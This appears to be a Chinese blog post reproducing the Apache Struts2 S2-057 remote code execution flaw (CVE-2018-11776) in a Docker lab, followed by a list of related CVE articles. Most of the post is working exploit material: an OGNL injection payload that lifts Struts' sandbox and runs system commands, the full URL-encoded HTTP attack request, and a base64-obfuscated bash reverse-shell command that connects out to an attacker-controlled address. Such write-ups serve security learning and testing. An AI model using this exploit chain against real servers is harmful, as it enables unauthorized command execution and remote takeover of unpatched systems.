2. 程式人生 > 其它 >S2-057 遠端程式碼執行漏洞(CVE-2018-11776)

S2-057 遠端程式碼執行漏洞(CVE-2018-11776)

阿新 發佈:2022-05-18

影響版本:<=Struts 2.3.34,Struts 2.5.16

漏洞詳情:

漏洞環境

執行如下命令啟動Struts 2.3.34:

docker-compose up -d

環境啟動後,訪問http://your-ip:8080/showcase/

,會看到Struts2測試頁面。

有效載荷:

http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

可以看到Location頭中已經返回了233*233的結果。

使用來自S2-057 漏洞分析和 POC的有效負載:

${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

Payload要經過URL編碼

GET /struts2-showcase/%24%7B%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action HTTP/1.1
Host: 192.168.10.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=E5EA783A0A714DDE8DF6E4EFD132BF3F
Upgrade-Insecure-Requests: 1

結果:

反彈Shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}
#URL編碼
bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOS85OTk5IDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

相關推薦

S2-057 遠端程式碼執行漏洞CVE-2018-11776

影響版本:<=Struts 2.3.34,Struts 2.5.16 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-057

S2-032 遠端程式碼執行漏洞CVE-2016-3081

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-032

S2-046 遠端程式碼執行漏洞CVE-2017-5638

影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-046

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

關於Spring Cloud Gateway 遠端程式碼執行漏洞CVE-2022-22947的安全告知

Spring Cloud Gateway 是 Spring Cloud 下的一個專案,該專案是基於 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技術開發的閘道器,它旨在為微服務架構提供一種簡單有效統一的 API 路由管理方式。

漏洞通告】Apache Struts2遠端程式碼執行漏洞CVE-2021-31805

轉至:https://www.venustech.com.cn/new_type/aqtg/20220413/23713.html 0x00 漏洞概述 CVE   ID CVE-2021-31805

開源應用框架Spring Framework存在遠端程式碼執行漏洞CVE-2022-22965解決方案

監測發現,開源應用框架Spring Framework存在遠端程式碼執行漏洞(CVE-2022-22965。經分析研判,在JDKJava開發工具包9及以上版本環境中,或版本低於5.3.18和5.2.20的Spring框架及衍生框架構建的網站或應用中,

Spring Framework遠端程式碼執行漏洞CVE-2022-22965

一、漏洞描述 springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

mongo-express 遠端程式碼執行漏洞CVE-2019-10758

mongo-express是一款mongodb的第三方Web介面,使用node和express開發。如果攻擊者可以成功登入,或者目標伺服器沒有修改預設的賬號密碼admin:pass,則可以執行任意node.js程式碼

gitlist 0.6.0 遠端命令執行漏洞CVE-2018-1000533

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞

GitLab 遠端命令執行漏洞CVE-2021-22205

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

node-postgres 程式碼執行漏洞CVE-2017-16082

漏洞原理 node-postgres在處理型別為Row Description的postgres返回包時,將欄位名拼接到程式碼中。由於沒有進行合理轉義,導致一個特殊構造的欄位名可逃逸出程式碼單引號限制,造成程式碼執行漏洞

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10204

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞CVE-2018-16621的繞過。

Webmin 遠端命令執行漏洞CVE-2019-15107

Webmin是一個用於管理類Unix系統的管理配置工具,具有Web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令。

Weblogic命令執行漏洞CVE-2018-2628復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

Struts2 S2-059 遠端程式碼執行漏洞(CVE-2019-0230)

Apache Struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的OGNL表示式,造成OGNL表示式注入。從而可能造成遠端執行程式碼